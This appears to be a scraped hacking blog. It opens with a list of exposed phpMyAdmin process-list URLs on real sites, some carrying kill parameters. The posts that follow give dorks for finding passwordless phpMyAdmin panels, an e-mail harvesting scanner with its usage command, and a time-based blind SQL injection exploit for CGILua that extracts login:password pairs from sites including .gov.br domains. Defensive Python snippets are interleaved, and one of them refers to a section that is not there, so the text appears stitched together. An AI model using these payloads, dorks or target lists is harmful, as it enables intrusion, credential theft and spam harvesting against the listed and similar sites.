http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=6b7d94bc8ead69989a5029f85594ac28&kill=11628
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=615dee42fa4bb4f27dadb0fc5443a126&kill=14768
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=79d1803b895548651c481a7358109955&kill=171800
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=dde1ce380bf8aef5e540b98d03c71f82&kill=49081
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=5e5761963c4f8e162ef84d9c1314426b&kill=28424
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=fe769b489d3faa1af424d7f494a2fd7b&kill=5552
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=81809c221f69540df71746d8a4974216&kill=115784
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=7bd07acd4c06d737d445184c2daa9934&kill=154635
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=3023cf534d907c3096a907c26f2b31df&kill=17227
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=28b024572f0f02fa5540619532cc448c&kill=12683
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=61415fd5a6703bff296bd9a95b186a9c&kill=30052
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=87ad999dfd8e1e831ee4d8a7a4fdc6be&kill=4724
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=a5c70b6418a08d53b441f85aba7ab469&kill=16152
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=08c87f19ccbea81587423b4c7658a17e&kill=14637
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=b17527ee7093814acd79faef0ca0642a&kill=17173
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=15c68c757f728a341a8e670a6dec1f74&kill=12618
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=d4b87d5771681e2677becd9cfa8cc42b&kill=730
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=d52749f3c3fa8de4f3cb4c692ee27bc1&kill=15447
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=9c4973ed00c81fea82949e86074767da&kill=10851
http://royaltouchny.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=b64ac0249e08905103b6c694b46d209b
http://www.elektro-denker.com/phpMyAdmin-elebwbvm/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=6788654e634886ee9ca4ca18818a7f99&full=1
http://202.137.230.154/phpmyadmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=04f7d18dd41feabf6f193ce98845d0e7
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=ef4ce41cc7bb19fa4216a8d1fd89b2a5&kill=84848
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=28e762b909008475fa0df0b505d9594d&kill=90009
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=d54040fd24f287358e5c83e51d41005a&kill=82080
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=dbff09ac97b69ce0b6647a1aed5b9424&kill=82182
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=03aa0d1eb55f9506a963c6b3f7222362&kill=88181
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=b83e7763a2d3035eadf0a3f6c5c20827&kill=80865
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=16599770
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=3127566
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=2344240
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=17134474
http://118.97.147.162/phpmyadmin/server_processlist.php?token=914db90734e2ffdf1ae593444fac693a
http://www.rocketys.net/server_processlist.php?token=6fe896b38b75bc846cefc533fa18b8b9
http://made-in-dk.eu/phpMyAdmin-knoktfdu4/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=5a55615d2a73c3ee8e79741f1c27c637&kill=35563628
http://maxxyz.de/server_processlist.php?token=a863cfb68b631c080e3e289b75dfee9c
http://www.self.org.uk/server_processlist.php?token=5bfb8e5316455b364516652ae3fd34cb
http://itarget.fr/phpmyadmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1a8151db903b7e9cf2a0ee3ea2815bd4
http://xellnaga.free.fr/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=61023193d1a9303ab9c0a9fa397ef1cd
http://www.inrx.cn/shopinrxadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=2711119
http://www.inrx.cn/shopinrxadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=80890
http://www.inrx.cn/shopinrxadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=500730
http://210.14.6.59/phpmyadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=3333&phpMyAdmin=73684aa4546609bf75358e6b1a9e6e91
http://210.14.6.59/phpmyadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=14037&phpMyAdmin=73684aa4546609bf75358e6b1a9e6e91



Thursday, 23 January 2014

TUTORIAL / SEARCHING FOR EMAILS [ SCANNER INURLMAIL 1.0 ]


INURLMAIL


Demonstration of the scanner in use. The version used in this video is a beta, but the download link provided is already the final release.
VIDEO LESSON PART-01
###################################
* SCANNER INURL-MAIL 1.0
* PHP Version 5.4.7
* php5-curl LIB
* cURL support enabled
* cURL Information 7.24.0
* Apache 2.4
* allow_url_fopen = On
* Search engine: GOOGLE
* Read & write permission
* -----------------------------------------------------------------
* LISTMAIL SEARCH
* GOAL: USE THE GOOGLE SEARCH ENGINE TO CAPTURE EMAIL LISTS.
* FOR EACH URL FOUND BY THE SEARCH ENGINE, A FILTER IS APPLIED THAT CAPTURES THE EMAILS
* CONTAINED IN THE URL.
* -----------------------------------------------------------------
* GOOGLEINURL BRASIL GROUP - ADVANCED SEARCH.
* fb.com/GoogleINURL
* twitter.com/GoogleINURL
* blog.inurl.com.br
################################

Tutorial SCANNER INURLMAIL 1.0 PART-01





Usage command:
php inurlmail.php  --dork='site:.com.br hotmail ext:txt'  --arquivo='mails.txt'
php inurlmail.php ajuda

Tutorial SCANNER INURLMAIL 1.0 PART-02



Download: https://github.com/googleinurl/INURLMAIL

Tuesday, 10 December 2013

Using SCANNER INURL to find flaws in CGILua applications

Exploiting CGILua

CGILua is a tool for creating dynamic web pages and handling data submitted through web forms.
Each page has a specific reference ID ("sid") that the framework uses in most of its URLs.

EXPLOIT USED: '0x272D2D3B

DORK[1]: CGILua 3.2.1 CGI
Filtering by domain.
DORK[2]: site:.gov.br intext:"CGILua 3.2.1 CGI"
DORK[3]: inurl:cgi/cgilua.exe/sys/start.htm?sid=1
DORK[4]: inurl:"cgi/cgilua.exe/"


Using SCANNER INURL to find possible flaws:

TOTAL URLs: 75

TOTAL POSSIBLE VULNS: 18

RESULTS FILE: resultados.txt

http://blog.inurl.com.br/2013/09/cgilua-321-cgi-exploit.html

Scanner INURL:
https://code.google.com/p/scanner-inurl/

Monday, 2 December 2013

Dork to get access to the phpMyAdmin panel.

phpMyAdmin without a password
Access to phpMyAdmin without a password

phpMyAdmin is a web application written in PHP for administering MySQL over the Internet. With it you can create and drop databases, create, drop and alter tables, insert, delete and edit fields, run SQL code and manage key fields. phpMyAdmin is widely used by web developers who often need to manipulate databases. It is normally treated as a mandatory tool on almost every web host, as well as in off-line packages such as WAMPServer, XAMPP, EasyPHP and PHP Triad.
Ref: http://pt.wikipedia.org/wiki/PhpMyAdmin


DORK[0]: ext:php  intext:"SQL-query" intext:"Without PHP Code" & intitle:("phpMyAdmin 2*)

DORK[1]: inurl:.php? intext:"CHARACTER_SETS,COLLATIONS" intitle:phpmyadmin intext:"Field_name"

DORK[2]: inurl:.php? intext:"information_schema" intitle:phpmyadmin intext:"Field_name"

DORK[3]: ext:php  intext:"SQL-query" intitle:phpmyadmin & intext:"Show this query here again "

DORK[4]: ext:php  intext:"SQL-query" intitle:phpmyadmin intext:"Field_name"

DORK[5]: intitle:phpmyadmin intext:" [Edit] [Explain SQL]"

DORK[6]: site:br intitle:phpmyadmin intext:" [Edit] [Explain SQL]"


The dorks above were based on the following one:
http://www.exploit-db.com/ghdb/3862/
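The dorks above only work because a search engine has crawled the panel's own pages (SQL-query, Field_name, Explain SQL and so on). The check below is an added example, not the blog's code and not phpMyAdmin's: it reads Apache combined access-log lines (constructed samples here) and flags phpMyAdmin scripts, the ones named in the dorks on this page, that were served with HTTP 200 either to a search-engine crawler or to an address outside an assumed DBA allowlist of 10.0.0.0/8. A crawler hit on a panel page means the panel is public and about to become dorkable; a 302 to the login form is the expected, harmless case.

```python
import re
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined" access-log lines (IPs, paths and tokens are made up).
SAMPLE_LOG = """\
203.0.113.7 - - [02/Dec/2013:10:01:12 +0000] "GET /phpmyadmin/server_processlist.php?token=deadbeef HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.23 - - [02/Dec/2013:10:02:40 +0000] "GET /phpmyadmin/server_sql.php?token=deadbeef HTTP/1.1" 200 8810 "-" "Mozilla/5.0"
10.0.0.5 - - [02/Dec/2013:10:03:01 +0000] "GET /phpmyadmin/index.php?target=server_variables.php HTTP/1.1" 200 2044 "-" "Mozilla/5.0"
198.51.100.23 - - [02/Dec/2013:10:04:15 +0000] "GET /phpmyadmin/server_import.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Dec/2013:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Script names taken from the dorks in the posts above.
PMA_SCRIPTS = {
    "server_variables.php", "server_processlist.php", "server_engines.php",
    "server_sql.php", "server_import.php", "server_export.php",
    "db_structure.php", "main.php", "server_collations.php",
}

# Networks from which DBA access is expected (an assumption for this example).
ALLOWED_NETS = [ipaddress.ip_network("10.0.0.0/8")]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    return d


def panel_script(path):
    """Return the phpMyAdmin script a request path addresses, or None."""
    parts = urlsplit(path)
    script = parts.path.rsplit("/", 1)[-1]
    if script == "index.php":
        # Frameset wrapper form seen in the dorks: index.php?target=server_sql.php
        target = parse_qs(parts.query).get("target", [""])[0]
        return target if target in PMA_SCRIPTS else None
    return script if script in PMA_SCRIPTS else None


def classify(entry):
    """Return a reason string if the entry shows an exposed panel, else None."""
    script = panel_script(entry["path"])
    if script is None or entry["status"] != 200:
        return None  # not a panel page, or a redirect to the login form (expected)
    if any(bot in entry["ua"].lower() for bot in ("googlebot", "bingbot")):
        return "crawler fetched %s: the panel will be indexed and dorkable" % script
    if not any(ipaddress.ip_address(entry["ip"]) in net for net in ALLOWED_NETS):
        return "%s served to a non-allowlisted address" % script
    return None


def find_exposures(log_text):
    """Return [(ip, path, reason)] for every log line that indicates exposure."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reason = classify(entry)
        if reason:
            hits.append((entry["ip"], entry["path"], reason))
    return hits


if __name__ == "__main__":
    for ip, path, reason in find_exposures(SAMPLE_LOG):
        print(ip, path, "->", reason)
```

Run it against a real access log with `find_exposures(open("access.log").read())`; any crawler hit on a panel script is the signal that the installation needs a login (see the config audit earlier on this page) or an IP restriction in front of it.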

Friday, 20 September 2013

EMAIL LIST SEARCH DORK


DORK['0'] site:.br [email protected] (hotmail|yahoo|bol) br ext:txt
DORK['1'] site:br title:"index of" @ yahoo br ext:csv

Example of a find:
site:www.contabeis.com.br ext:txt
site:www.tramontina.com.br ext:csv
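Both the INURLMAIL scanner earlier on this page and the ext:txt / ext:csv dorks in this post depend on the same thing: address lists sitting in files the web server hands out to anyone. The audit below is an added example (not the blog's code and not INURLMAIL's) that runs over one's own web root and reports text-like files holding many distinct e-mail addresses, so they are found before a search engine indexes them. The sample tree it builds is constructed data with example.com / example.org addresses.

```python
import os
import re
import tempfile

# RFC 5322 is far looser; this pattern catches the common forms a harvester extracts.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# File types a search engine will index and a harvester will read (ext:txt, ext:csv ...).
TEXT_EXTS = {".txt", ".csv", ".html", ".htm", ".xml", ".json"}


def extract_emails(text):
    """Distinct, lower-cased addresses found in the text, sorted."""
    return sorted({m.group(0).lower() for m in EMAIL_RE.finditer(text)})


def scan_webroot(root, threshold=5):
    """Return [(relative_path, count)] for files holding >= threshold distinct addresses,
    largest first. Binary and other non-text files are skipped."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in TEXT_EXTS:
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                count = len(extract_emails(fh.read()))
            if count >= threshold:
                findings.append((os.path.relpath(full, root), count))
    return sorted(findings, key=lambda f: -f[1])


def build_sample_webroot():
    """Create a constructed web root under a temp dir (sample data, not real addresses)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "uploads"))
    # A participant export left in an uploads directory: 12 distinct addresses.
    with open(os.path.join(root, "uploads", "participants.csv"), "w", encoding="utf-8") as fh:
        fh.write("name,email\n")
        for i in range(12):
            fh.write("user%d,user%d@example.com\n" % (i, i))
    # A normal contact page with two addresses: below the default threshold.
    with open(os.path.join(root, "contact.html"), "w", encoding="utf-8") as fh:
        fh.write("<p>Write to info@example.org or press@example.org</p>")
    # A binary file: skipped by extension.
    with open(os.path.join(root, "logo.png"), "wb") as fh:
        fh.write(b"\x89PNG not scanned")
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    for rel, n in scan_webroot(root):
        print("%5d addresses  %s" % (n, rel))
```

On a real host point `scan_webroot` at the document root (and at upload directories served by the site); anything it reports should be moved out of the web root or put behind authentication, and directory listing should be off so the file is not discoverable by "Index of" dorks either.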

Tuesday, 17 September 2013

CGILua 3.2.1 CGI exploit


CGILua is a tool for creating dynamic web pages and handling data submitted through web forms.
CGILua separates data handling from the logic of the page-generation process, which makes it easier to develop web applications in Lua. One of CGILua's advantages is its ability to abstract away the web server in use.
You can develop a CGILua application for one web server and run it on any other CGILua-compatible web server.
CGILua is a program written in C into which you embed fragments written in Lua. The CGILua executable handles all communication between that Lua fragment and the Internet's HTTP protocol; in other words, it plays the role of the CGI.


======================================================================
DORK[1]: CGILua 3.2.1 CGI
Filtering by domain.
DORK[2]: site:.gov.br intext:"CGILua 3.2.1 CGI"
DORK[3]: inurl:cgi/cgilua.exe/sys/start.htm?sid=1
DORK[4]: inurl:"cgi/cgilua.exe/"
======================================================================


Each page has a specific reference ID ("sid") that the framework uses in most of its URLs.
For example, to access the page referred to by ID = 1, the
following URL is used:

======================================================================
Exploit - SQL injection
======================================================================

FLAW: /publique/cgi/cgilua.exe/sys/start.htm?sid=1[SQL-INJECTION]

EXPLOIT = /publique/cgi/cgilua.exe/sys/start.htm?sid=1))+UNION+ALL+SELECT+IF((ASCII(SUBSTRING((SELECT+CONCAT(F_Login,':',F_Password)+FROM+Publique.T_Actor+LIMIT+1+OFFSET+0),1,1))>97),BENCHMARK(1000000,MD5('A')),0)%23


This query first concatenates the "F_Login" and "F_Password" columns of the internal table "T_Actor" and returns the first row (thanks to the "LIMIT 1 OFFSET 0" clause). It then checks whether the ASCII value of the first character returned is greater than 97 (the letter 'a'). If the condition holds, it triggers the benchmark function, causing a noticeable delay in the server's response (around 4 seconds in our test lab). By repeating the query

======================================================================
USING THE EXPLOIT:
======================================================================

http://SITE/publique/cgi/cgilua.exe/sys/start.htm?sid=1[EXPLOIT]


http://SITE/publique/cgi/cgilua.exe/sys/start.htm?sid=1))+UNION+ALL+SELECT+IF((ASCII(SUBSTRING((SELECT+CONCAT(F_Login,':',F_Password)+FROM+Publique.T_Actor+LIMIT+1+OFFSET+0),1,1))>97),BENCHMARK(1000000,MD5('A')),0)%23


NOT ALL OF THEM WORK, but the attempt may produce an error that shows you which type of database you are dealing with, so you can direct your attempt better.
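The injection works because the sid value is placed into the SQL statement exactly as received, and the blind technique the post explains leaks one comparison per request through the BENCHMARK delay. As an added example, not the blog's code and not CGILua's, here is the check the application side should apply before building any query (accept only a plain decimal page id), together with a request classifier that flags the time-based markers named above (UNION/SELECT, BENCHMARK, SLEEP, quotes and comment terminators) in the sid parameter. The request paths are constructed, modelled on the start.htm?sid= URL pattern discussed in this post; the real fix in the application remains a parameterised query.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request paths (not taken from any real log), modelled on the
# /publique/cgi/cgilua.exe/sys/start.htm?sid= pattern discussed above.
SAMPLE_REQUESTS = [
    "/publique/cgi/cgilua.exe/sys/start.htm?sid=1",
    "/publique/cgi/cgilua.exe/sys/start.htm?sid=42",
    "/publique/cgi/cgilua.exe/sys/start.htm?sid=1'",
    "/publique/cgi/cgilua.exe/sys/start.htm?sid=1))+UNION+ALL+SELECT+IF((1>0),BENCHMARK(1000000,MD5('A')),0)%23",
    "/publique/cgi/cgilua.exe/sys/start.htm?sid=1+AND+SLEEP(5)",
]

# A page id is a short decimal number and nothing else.
SID_RE = re.compile(r"^[0-9]{1,9}$")

# Tokens that have no business in a numeric page id, lower-cased. The '#' and '--'
# entries are the MySQL comment terminators the payload above ends with (%23 = '#').
SQLI_MARKERS = ("union", "select", "benchmark(", "sleep(", "'", "--", "#", "/*")


def validate_sid(raw):
    """Server-side check a CGILua page should apply before building a query:
    accept only a plain decimal id and return it as int, otherwise None."""
    if raw is None or not SID_RE.match(raw):
        return None
    return int(raw)


def classify_request(path):
    """Return ('ok', sid) for a clean request, or ('suspicious', markers) otherwise.

    parse_qs already percent-decodes and turns '+' into spaces, so the markers are
    matched against the value the application would actually have used.
    """
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    raw = qs.get("sid", [None])[0]
    sid = validate_sid(raw)
    if sid is not None:
        return ("ok", sid)
    decoded = (raw or "").lower()
    markers = [m for m in SQLI_MARKERS if m in decoded]
    return ("suspicious", markers)


def scan_requests(paths):
    """Classify every path; returns [(path, verdict, detail)]."""
    return [(p, *classify_request(p)) for p in paths]


if __name__ == "__main__":
    for path, verdict, detail in scan_requests(SAMPLE_REQUESTS):
        print(verdict, detail, path)
```

A request whose sid fails validate_sid should be answered with a 400 and never reach the database; the classifier output is what to alert on, and a burst of "suspicious" hits carrying BENCHMARK or SLEEP against one sid is the signature of the character-by-character extraction described above.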


REF: http://pt.wikipedia.org/wiki/CGILua
REF: http://www.securityfocus.com/archive/1/archive/1/509142/100/0/threaded
Tutorial CGILua 3.2: http://www.yumpu.com/pt/document/view/5904124/tutorial-cgilua-32